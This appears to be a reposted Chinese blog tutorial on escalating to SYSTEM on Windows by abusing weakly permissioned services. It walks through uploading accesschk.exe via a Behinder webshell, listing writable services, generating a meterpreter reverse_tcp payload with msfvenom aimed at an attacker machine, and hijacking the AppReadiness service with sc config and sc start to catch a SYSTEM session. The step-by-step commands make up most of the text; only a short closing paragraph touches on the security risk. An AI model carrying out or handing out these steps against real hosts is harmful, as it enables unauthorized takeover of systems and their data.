一、介紹
1.原理:Windows服務有時被配置為與服務本身或與服務運行的目錄相關的弱權限,這可能允許攻擊者操縱服務,以便在其啟動時執行任意代碼,并將權限提升到SYSTEM,
2.利用方法:將服務的 binpath 更改為我們上傳的木馬檔案路徑,以便在服務啟動時執行惡意代碼從而獲得system權限,
accesschk.exe工具介紹:
accesschk是一個windows系統配置檢查工具,用于查看檔案、注冊表項、服務、行程、內核物件等的有效權限,該工具將有助于識別當前用戶是否可以修改某個服務目錄中的檔案,
由于它是微軟官方出品,我們將其上傳至靶機,執行不會受到阻礙
下載地址:https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
二、演示
靶機:騰訊云服務器 裝有phpstudy環境的Windows server 2012 IP地址:49.xxx.xxx.xxx
攻擊機:阿里云服務器 裝有msf的ubuntu系統 IP地址:101.xxx.xxx.xxx
1.上傳accesschk.exe到靶機
通過冰蝎將accesschk.exe上傳至靶機C盤根目錄
2.啟動accesschk.exe
第一次執行accesschk.exe會跳出一個提示視窗讓我們接受許可,我們執行accesschk.exe /accepteula命令繞過以自動接受,
檢測服務權限配置:執行命令檢測,檢測當前用戶可以操作的服務項
accesschk.exe -uwcqv "Administrators" *
3.上傳木馬檔案
啟動msf生成名為shell.exe的木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊機IP地址 LPORT=4444 -f exe > shell.exe
將木馬上傳至靶機C盤根目錄
msf開啟監聽
4.更改服務路徑指向
從剛剛我們使用accesschk.exe查看到的可以操作的服務項中隨意挑選一個,這里我們選擇AppReadiness這個服務,改變其binpath為上傳的木馬檔案路徑
sc config "AppReadiness" binpath="C:\shell.exe"
5.啟動服務,成功獲得system權限
啟動AppReadiness
sc start AppReadiness
msf收到會話,查看權限,提權成功
三、結論
服務是作業系統的核心,經常以特權訪問的方式運行,因為它們可能需要訪問作業系統中受限的檔案、注冊表鍵等來執行任務,當服務沒有得到適當的保護,允許用戶操縱它們的配置、二進制檔案、注冊表鍵或者去啟動和停止服務時,這就會給系統帶來安全問題,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/499469.html
標籤:其他
上一篇:資訊收集